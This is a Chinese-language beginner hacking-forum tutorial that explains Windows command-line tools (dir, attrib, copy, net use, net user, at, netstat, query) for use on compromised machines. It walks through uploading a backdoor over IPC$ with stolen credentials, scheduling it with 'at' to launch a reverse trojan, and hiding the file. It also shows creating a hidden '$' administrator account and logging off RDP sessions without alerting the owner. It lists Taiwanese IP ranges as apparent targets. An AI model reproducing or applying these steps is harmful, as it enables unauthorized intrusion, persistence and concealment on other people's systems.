菜鸟入门版-DOS命令
<span style="FONT-SIZE: 11px;">序言<br/><br/>大家在入侵时,一定会用到DOS命令的,它的功能非常的强大.今天我就对常用的DOS命令作个详细的解说.主要是给刚入门者和接触DOS命令少的朋友看的.下面我挑几个比较常用的给大家说说.<br/>以windows2000为例,windows xp类同.<br/><br/>DIR<br/>显示当前盘下的所有文件夹和文件.<br/>比较常用的方法是,你上传一个后门或服务端(这儿比如名字叫systems.exe)到肉鸡的c:\winnt\system32下,你想看看有没有上传成功.可以用DIR命令看一下. 命令如下 :<br/><br/> DIR c:\winnt\system32\systems.exe<br/><br/>则会显示:<br/> 2004-05-24 20:06 194,762 systems.exe<br/> 1 个文件 194,762 字节<br/> 0 个目录 4,658,597,888 可用字节<br/><br/>如果你没有上传成功,则显示如下:<br/> 驱动器 C 中的卷没有标签。<br/> 卷的序列号是 6458-3DB8<br/> c:\winnt\system32\的目录<br/> 找不到文件<br/><br/>CD<br/>改变当前目录<br/>具体看一下下面的命令:<br/> C:\>cd winnt file://进/入winnt文件夹<br/><br/> C:\winnt>cd system32 file://进/入system32 文件夹<br/><br/> C:\winnt\system32>cd.. file://回/到上一级目录<br/><br/> C:\winnt>cd..<br/><br/> C:\><br/> C:\>d: file://进/入D盘<br/><br/> D:\>e: file://进/入E盘<br/><br/> E:\><br/><br/>del和deltree<br/>DEL:删除文件.<br/>看下面的命令:<br/> C:\>del c:\xx\ww.txt file://删/除C盘的XX目录下的名叫WW的文件.<br/><br/> C:\><br/> C:\>del c:\xx\*.* file://删/除C盘的XX目录下所有文件<br/><br/>deltree<br/>这个更具有破坏性,不但能删除所有文件,连文件夹也删除<br/> <br/> C:\>deltree c:\winnt file://删/除C盘下的winnt所有文件和文件夹.<br/>这个大家要小心使用.<br/><br/><br/>attrid<br/>显示和更改文件或文件夹属性.<br/>文件或文件夹的属性有 隐藏,用字母H表示. 只读,用R表示. 存档,用A表示. 系统,用S表示<br/>改变一个文件或文件夹属性, " + " 表示增加, " - ",表示去掉某个属性.<br/>平时我们都把后门或服务端到上传肉鸡的c:\winnt\system32下.在进入了肉鸡的CMD以后,为了更加的不让肉鸡管理员知道,我们可以把你上传的隐藏起来.比如还是上面的systems.exe<br/>命令如下:<br/> C:\>attrid +h c:\winnt\system32\systems.exe file://这/样在system32下就找不到systems.exe<br/><br/> C:\>attrid -h c:\winnt\system32\systems.exe file://去/掉systems.exe的隐藏属性<br/><br/>copy<br/>复制一个或多个文件到其它目录<br/>比如你把C盘下一个叫1.txt文件复制到D盘的vv文件夹下,<br/> <br/> C:\>copy c:\1.txt d:\vv\1.exe<br/><br/>比如你和肉鸡建立了IPC$连接(如何连接?以后会讲的),而且肉鸡开放了共享,这里比如开放了D盘.你可以把你C盘下的一个叫systems.exe的后门或服务端上传肉鸡的D盘下,命令如下:<br/> <br/> C:\>copy c:\systems.exe file://肉/鸡IP\d$<br/><br/><br/>type<br/>显示文件内容<br/>我现在在我的C盘的XX目录下新建一个叫hack.txt的文件,内容是一些台湾的IP<br/>命令如下:<br/><br/> C:\>type c:\xx\hack.txt<br/>序号 开始IP地址 结束IP地址 国家/省/直辖市 城市/区县/组织<br/>58 024.179.140.000 024.179.150.255 中国台湾省<br/>80 061.013.000.000 061.013.255.255 中国台湾省<br/>86 061.058.065.000 061.058.070.255 中国台湾省<br/>87 061.059.160.000 061.059.255.255 中国台湾省<br/>89 061.070.100.000 061.070.150.255 中国台湾省<br/>1788 061.217.179.000 061.217.179.255 中国台湾省 台南市<br/>1789 061.216.000.000 061.219.255.255 中国台湾省<br/>1790 061.220.080.000 061.220.150.255 中国台湾省 台北市<br/>1791 061.224.000.000 061.224.255.255 中国台湾省 台北市<br/>1792 061.225.000.000 061.225.255.255 中国台湾省<br/>3390 134.208.000.000 134.208.255.255 中国台湾省<br/>3584 139.175.000.000 139.175.255.255 中国台湾省<br/>3590 140.092.000.000 140.092.255.255 中国台湾省<br/>3593 140.096.000.000 140.096.255.255 中国台湾省<br/>3596 140.112.000.000 140.112.255.255 中国台湾省 台湾大学<br/>C:\><br/><br/>它还有一个用法,就是在进入肉鸡的CMD以后,看看肉鸡用的是什么操作系统,命令如下,在我电脑操作的结果如下:<br/><br/> C:\>type c:\boot.ini<br/><br/> [boot loader]<br/> timeout=30<br/> default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS<br/> [operating systems]<br/> multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft WindowsXP Professional"<br/> /fastdetect<br/><br/>看出来没有?,我用的是XP系统.<br/><br/>这是一些我认为常用的命令,其它的还有rd,md等.你们有兴趣可以找资料看看.平进比较少用.<br/><br/>ping<br/>这个是用的最多的命令.可是现在好像不灵光了.大多数网站和个人电脑用防火墙屏蔽了ping.大多数时候根本是P不通.基本命令:<br/> ping ip<br/> ping 网址<br/><br/>下面P的是本站:<br/><br/>C:\>ping <a href="http://www.hf110.com/" target="_blank"><font color="#333333">http://www.hf110.com/</font></a><br/><br/>Pinging <a href="http://www.hf110.com/" target="_blank"><font color="#333333">http://www.hf110.com/</font></a> [218.89.0.231] with 32 bytes of data:<br/><br/>Reply from 218.89.0.231: bytes=32 time=67ms TTL=116<br/>Reply from 218.89.0.231: bytes=32 time=67ms TTL=116<br/>Reply from 218.89.0.231: bytes=32 time=66ms TTL=116<br/>Reply from 218.89.0.231: bytes=32 time=67ms TTL=116<br/><br/>Ping statistics for 218.89.0.231:<br/> Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),<br/>Approximate round trip times in milli-seconds:<br/> Minimum = 66ms, Maximum = 67ms, Average = 66ms<br/><br/>上面P出本站的IP是218.89.0.231,从TTL=116.大略看出使用的是windows操作系统.一般来说TTL值在128左右的是windows操作系统,值在225左右的,大多数是unix类系统.但是还有特殊情况,管理员可能会通过改注册表来修改TTL值.<br/><br/><br/>net use<br/>在得到肉鸡的用户名和密码这后,可以用这个命令做IPC$连接<br/><br/>net use \\肉鸡ip\ipc$ "密码" /user:"用户名"<br/><br/>连接成功后,上传后门或服务端,(比如叫systems.exe,在你的D盘下).<br/><br/>copy D:\systems.exe \\肉鸡ip\c$ //这里它要开放共享,你才能上传.否则无法上传成功.<br/><br/>net time \\肉鸡ip //看一下肉鸡的时间,是24小时制.比如这儿是下午3点10分.写作15:10<br/><br/>at \\肉鸡ip 15:12 systems.exe //在15:12分,运行systems.exe<br/><br/>在这儿,你上传的是反弹木马的话,可以等着它来连接你.其实在入侵过程中,有很多的偶然性,比如上面的,你可以IPC连接成功.但是并一定能够通过net time \\肉鸡ip ,看肉鸡时间.就算能看到时间吧,有时肉鸡的at服务并没有打开.就算打开了,但是后门或服务端不一定能够有机会运行,<br/>可能被杀毒软件查杀.所以在入侵过程中,失败是常有的事.这个方法不行,可以另一种.<br/><br/><br/>net user<br/>查看用户或新建一个用户.<br/>这是在我电脑上的截图<br/><br/><br/>C:\>net user<br/><br/>file://BILLGATES/ 的用户帐户<br/><br/>---------------------------------------------------------------------<br/>Guest guest1 HelpAssistant<br/>SUPPORT_388945a0 yhkj<br/>命令成功完成。<br/><br/><br/>C:\><br/><br/><br/>上面是我所有的用户.<br/>现在我新建一个setwell的用户,密码是123456, 截图如下<br/><br/>C:\>net user setwell 123456 /add<br/>命令成功完成。<br/><br/>C:\>net localgroup administrators setwell /add //这条命令是加setwell为管理员<br/>命令成功完成。 <br/><br/><br/>接下来我们再net user ,载图如下<br/><br/>C:\>net user<br/><br/>file://BILLGATES/ 的用户帐户<br/><br/>----------------------------------------------------------------<br/>Guest guest1 HelpAssistant<br/>setwell SUPPORT_388945a0 yhkj<br/>命令成功完成。<br/><br/><br/>建立的用户可以用net user命令看到,我们在用户后面加个$,可以小小的隐藏一下.这次建一个叫set的用户,截图如下:<br/><br/>C:\>net user set$ 123456 /add<br/>命令成功完成。<br/><br/>C:\>net localgroup administrators set$ /add<br/>命令成功完成。 <br/><br/>C:\>net user<br/><br/>file://BILLGATES/ 的用户帐户<br/><br/>-----------------------------------------------------------------<br/>Guest guest1 HelpAssistant<br/>setwell SUPPORT_388945a0 yhkj<br/>命令成功完成。<br/><br/><br/>C:\><br/><br/>看到没有,我们没有看到刚才建立的用户set$,可以用这个命令看,net localgroup administrators ,这个命令的是显示所有的管理员,截图如下:<br/><br/><br/>C:\>net localgroup administrators<br/>别名 administrators<br/>注释 管理员对计算机/域有不受限制的完全访问权<br/><br/>成员<br/><br/>------------------------------------------------------<br/>guest1<br/>set$<br/>setwell<br/>yhkj<br/>命令成功完成。<br/><br/><br/>C:\><br/><br/><br/>看到没有,我们看到set$这个用户了.<br/><br/>如果要删除用户用这个命令:<br/><br/>C:\>net user setwell /delete<br/><br/><br/>net start<br/>1.启动某些服务<br/>比如: net start telnet //启动telnet服务<br/><br/>2.查看当前启动了什么服务.看看我的电脑启动了什么服务:<br/><br/>C:\>net start<br/>已经启动以下 Windows 服务:<br/><br/>Automatic Updates<br/>COM+ Event System<br/>Cryptographic Services<br/>DHCP Client<br/>Distributed Link Tracking Client<br/>DNS Client<br/>Error Reporting Service<br/>Event Log<br/>Help and Support<br/>IPSEC Services<br/>Logical Disk Manager<br/>Messenger<br/>菜鸟入门版-DOS命令之三<br/><br/>这只是一部分服务.<br/><br/><br/>net stop<br/>停止某些服务.站长今天也说到了.我不多了.<br/><br/>net share<br/>查看默认共享.也就是查看这些共享C$ D$ e$ f$ admin$ ipc$,这是系统默认的.我的全部关了,我<br/>到肉鸡上截张图吧.<br/><br/>C:\Documents and Settings\Administrator>net share<br/>D$ D:\ 默认共享 <br/>F$ F:\ 默认共享 <br/>ADMIN$ C:\WINNT 远程管理 <br/>C$ C:\ 默认共享 <br/>E$ E:\ 默认共享 <br/>命令成功完成。<br/><br/><br/>C:\Documents and Settings\Administrator><br/><br/>这个肉鸡的IPC$共享竟然关了.<br/><br/><br/>net view<br/>也是查看共享,但不是上面的默认共享了,还是来张截图吧.也是肉鸡的,<br/><br/>C:\Documents and Settings\Administrator>net view<br/>服务器名称 注释<br/><br/>-------------------------------------------------------------------------------<br/>file://17/ <br/>file://HMZ/ <br/>file://ZGH/ <br/>命令成功完成。<br/><br/><br/>C:\Documents and Settings\Administrator><br/><br/><br/>学DOS命令看起来有点烦,其实是挺容易学的.而且学好了,在入侵中,会起到举足轻重的作用.下次讲netstat 等命令.<br/><br/><br/>netstat -an <br/>使用这个命令可以察看到和本机的所有的连接.看一下在我电脑上的截图,<br/><br/>D:\>netstat -an<br/><br/>Active Connections<br/><br/>Proto Local Address Foreign Address State<br/>TCP 0.0.0.0:135 0.0.0.0:0 LISTENING<br/>TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING<br/>TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING<br/>TCP 0.0.0.0:5000 0.0.0.0:0 LISTENING<br/>TCP 180.254.158.42:139 0.0.0.0:0 LISTENING<br/>TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED<br/>UDP 0.0.0.0:500 *:*<br/>UDP 0.0.0.0:1035 *:*<br/>UDP 0.0.0.0:1037 *:*<br/>UDP 0.0.0.0:1134 *:*<br/>UDP 0.0.0.0:1136 *:*<br/><br/><br/><br/>Proto Local Address Foreign Address State<br/>协议 本地端口及IP地址 远程端口及IP地址 状态<br/><br/>LISTENING 监听状态 表示等待对方连接<br/><br/>ESTABLISHED 正在连接着.<br/><br/>TCP 协议是TCP<br/><br/>UDP 协议是UDP<br/><br/>TCP 218.95.49.187:2935 218.89.0.231:80 ESTABLISHED<br/>这个表示 利用tcp协议 本机ip(218.95.49.187通过端口:2935 和远程ip(218.89.0.231)端口:80连接<br/><br/><br/>query<br/>这个命令只有在开了3389端口(也不一定端口是3389,说不定改成别的端口了.严格讲应是开了远程终端服务)的机子,才能用上.我用1$的用户名上了一台3389机子,看一下截图:<br/><br/>c:\>query user<br/>USERNAME SESSIONNAME ID STATE<br/>administrator console 0 运行中<br/>1$ rdp-tcp#2 1 运行中<br/><br/><br/>看到上面没有,管理员也在,如果你要退出的话,就用如下命令:<br/><br/>logoff ID 这儿是logoff 1.<br/><br/>这是正常退出的.说到退出,还有一个办法,就是在开始---关机---注销1$.如果你用另外的方法退出的话,那么肉鸡在关机时,会出现类如"有一个其它客人登录到这台服务器,如果你退出,对方的会话数据会丢失"一类的话.这样管理员就会发现了.</span><br/>
页:
[1]